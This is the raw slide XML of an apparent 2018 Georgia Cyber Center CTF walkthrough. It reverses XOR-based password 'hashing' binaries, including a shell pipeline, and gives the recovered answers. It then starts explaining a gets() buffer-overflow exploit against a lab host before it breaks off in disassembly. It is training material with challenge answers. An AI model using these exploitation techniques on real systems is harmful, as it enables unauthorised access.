        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43365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091AD-D327-4CCF-82CA-FED8A385C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C16C22-8149-40DE-B9DE-9CB4C7ACE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31C56-D2D7-41A2-8A9A-9C52E7F1F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167BA-FD27-4F95-85B6-D35B63E3DD8B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/30/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D1DA95-9B0C-42D4-A2B4-7FE2AD3CF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533F2-6228-4491-97F8-AAC0EA88F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04DD7-560C-4414-A52E-434954C1EDB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43429-7D89-4297-B508-3F064336A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5F5F69-D54E-4680-9923-00BEAA59B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3CBBB-0B1E-4BDF-BEDC-4DB0A4B14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F3C51-EE99-4230-8568-58BF1229412C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/30/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4598C5-6E77-473A-9BF6-38C8591E4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BC2F42-3EAB-40D8-A927-FD5FFEAC1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82189-1FD3-4966-8CDC-A1322E4A2A9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B263DC-E14C-40FB-9D57-24AEA48033D6}"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Heavy" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>2018.11.06 Georgia Cyber Center CTF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE0B1B0-E11D-45B0-9A3F-9A514907F3AD}"/>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Clr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Binary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A408FE5-C099-46A9-9015-766B111EB0C0}"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE059FB-B10A-41C9-9440-9A0704900910}"/>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3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Okay, Sam did some more reading and learned the power of XOR, and used it to write his own password hashing function. He used it to encrypt his new password, which resulted in the output "151c081d0d09060e1703". Utilizing his password hashing binary to figure out how to reverse his hash and discover the password he used for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EAA9236-F137-47EA-9C63-C881B16407C9}"/>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input resulting in the hash output by hash_password4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB6BB2F-09D2-43C4-A8EF-BB1F122285A5}"/>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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Okay, let's start by running strings on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>binary..just</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> in case.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>strings hash_password4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>[]A\A]A^A_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Enter your password to encrypt:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>SnagleToth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333FF"/>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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>%02x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Is the XOR key he used really that obvious?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Let's try it and see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2EF39AB-8662-4761-A75E-C9214BDC370B}"/>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input resulting in the hash output by hash_password4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30988252-788F-4FE8-B6E1-F772AE316832}"/>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2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Yes...yes it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> is that obvious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>echo "0x151c081d0d09060e1703" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> -r | ./hash_password4  | sed 's/.*: /0x/g' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> -r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>FrizalRack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3333"/>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>What the above command does is take the hex hash from the question (with a prepended 0x to trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> to properly reverse it from hex, passes it back to the hashing binary (which should XOR it with the same key again, thus “decrypting” it), prepend 0x to it again and pass it back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> to convert it from hex to ASCII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DDB9E16-FED0-44C1-8658-A741AFD549A6}"/>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EC942A7-45ED-40E6-82B2-A52727894ECB}"/>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3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Okay, Sam has vastly improved his usage of XOR and used it to write his own password hashing function – way better than his previous attempts. He used it to encrypt another new password, which resulted in the output "363d18195458035e5e34". Utilizing his password hashing binary to figure out how to reverse his hash and discover the password he used for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7C926BB-41C0-4DE1-B4D9-8A544696140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5. Find the input resulting in the hash output by hash_password5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AFCE86C-FF9D-4745-988F-3F7218F61417}"/>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4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>If you open up the binary if you favorite RE tool and trace it, you'll see that, in a non standard order, each character gets XORed with a hardcoded character.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0F56C1A-A4C7-4EE9-AECB-868A06C60F3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5. Find the input resulting in the hash output by hash_password5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9247FC37-DD35-4409-8BD6-DBFA96C0281E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845719"/>
            <a:ext cx="10058040" cy="446364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1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>If you work through it and rearrange things, you eventually find what gets output are the hex values corresponding to these operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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[0] = 'X'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[2];</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[1] = 'T'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[1];</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[2] = 'l'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[7];</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[3] = 's'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[0];</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[4] = '$'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[9];</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[5] = '4'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[4];</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[6] = 'p'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[6];</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[7] = ';'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[5];</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[8] = '9'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[3];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>[9] = 'U' ^ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>original_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Tracing this through enables you to determine the original password was: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>jinglestap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
              <a:ea typeface="Tahoma"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E312D59-3B8A-46A4-917B-9336A90A3D44}"/>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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4728FB5-8DBA-4B6D-9EF8-45F60003C3C2}"/>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4800">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>There is an exploitable binary running on port 1999 on 192.168.250.251. Analyze a previous version of the code (without the true flag in it) to figure out how to remotely exploit it and gain the flag.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BD6A863-D6DB-491F-ACBE-DE1BA76AE4AB}"/>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Where is the hidden flag?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E789B556-7889-4E9A-A388-27974B4E5061}"/>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Notice the flag is printed in the f2 method but this method is never called.</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However, gets() is used in f1() to grab input from the user. Gets() is known to be vulnerable to buffer overflow attacks, so we will take advantage of this to obtain the flag.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9526ABE-62B0-4ACE-AA00-1C345CDEFF87}"/>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60E5DF76-C6F9-4281-94CF-BE0044628FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845719"/>
            <a:ext cx="10058040" cy="455508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000000000040060d &lt;f2&gt;:</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40060d:   55                      push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
            </a:endParaRP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40060e:   48 89 e5                mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
            </a:endParaRP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400611:   48 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> 20             sub    $0x20,%rsp</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400615:   48 89 7d e8             mov    %rdi,-0x18(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
